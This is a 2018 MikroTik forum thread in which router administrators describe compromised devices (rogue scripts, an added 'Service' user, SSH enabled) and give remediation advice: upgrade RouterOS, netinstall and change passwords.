Mikrotik Routers Compromised......please READ

vstman · July 25, 2018, 4:03pm

Just found all our routers are hacked. Hackers leaves scripts behind that allow php. Passwords compromised? Not sure how hacker got in since some routers have different passwords so???

php is a seeding thing, right?

Check your logs and work backwards to undo the hackers scripts, schedule, and firewall rules. Hacker also adds a new user called Service. Also enables SSH ports, ect.

After cleaning update to newest firmware, reboot.

Mikrotik?

R1CH · July 25, 2018, 4:26pm

If you weren’t running latest RouterOS you will have been compromised by various exploits, safest way forward is netinstall (and change all passwords).

msatter · July 25, 2018, 5:17pm

Mikrotik has now a blog.mikrotik.com in which security matters are addressed.

When I look at the most recent posting th advise is to upgrade to v6.38.5:

Upgrading to v6.38.5 or newer will remove the bad files, stop the infection and prevent anything similar in the future.

An earlier posting suggest to update 6.40.8 and that the latest secure version of RouterOS.

I strongly advise to have a fixed notice on blog which linked to in every article to that notice. This notice should state for bugfixed/current/RC the minimal recommended version of RouterOS.

I also would like to see a static notification at the top in Winbox box the last minimal recommended version of RouterOS. If the router accessed by Winbox runs on a lower than recommended version of RouterOS then display that recommendation in the title of every window opened inside Winbox.

IntrusDave · July 25, 2018, 5:38pm

I’m really shocked by the number of admins that NEVER update firmware!

CZFan · July 25, 2018, 5:57pm

Agree, what I also find funny is that they obviously do not log into forum regularly, if hey did, they would have known about these vulnerabilities, but as soon as they get hacked, then they can’t post fast enough on the forum

Sob · July 25, 2018, 6:24pm

As they say, “if it works, don’t touch it, stupid!”, so I’m not shocked at all. It’s nice to stay up to date, but who will appreciate it? Nobody, really. But you can be sure that everybody will scream as loud as they can, when upgrade goes bad. It also depends on who’s the user/admin. Someone like ISP should manage, because it’s their living. But some small company not dealing primarily with networks? Unlikely.

chechito · July 25, 2018, 8:35pm

totally agree

vstman · July 26, 2018, 12:22am

had 6.42.1 on them and update after I test on Office routers.

normis · July 26, 2018, 4:55am

Change password after upgrade. If they got your password 6-12 months ago, they still have the password in their database. This is the second wave, when they use the password. Even if you have a new version now, they still have a database of passwords!

All details were published months ago:
https://blog.mikrotik.com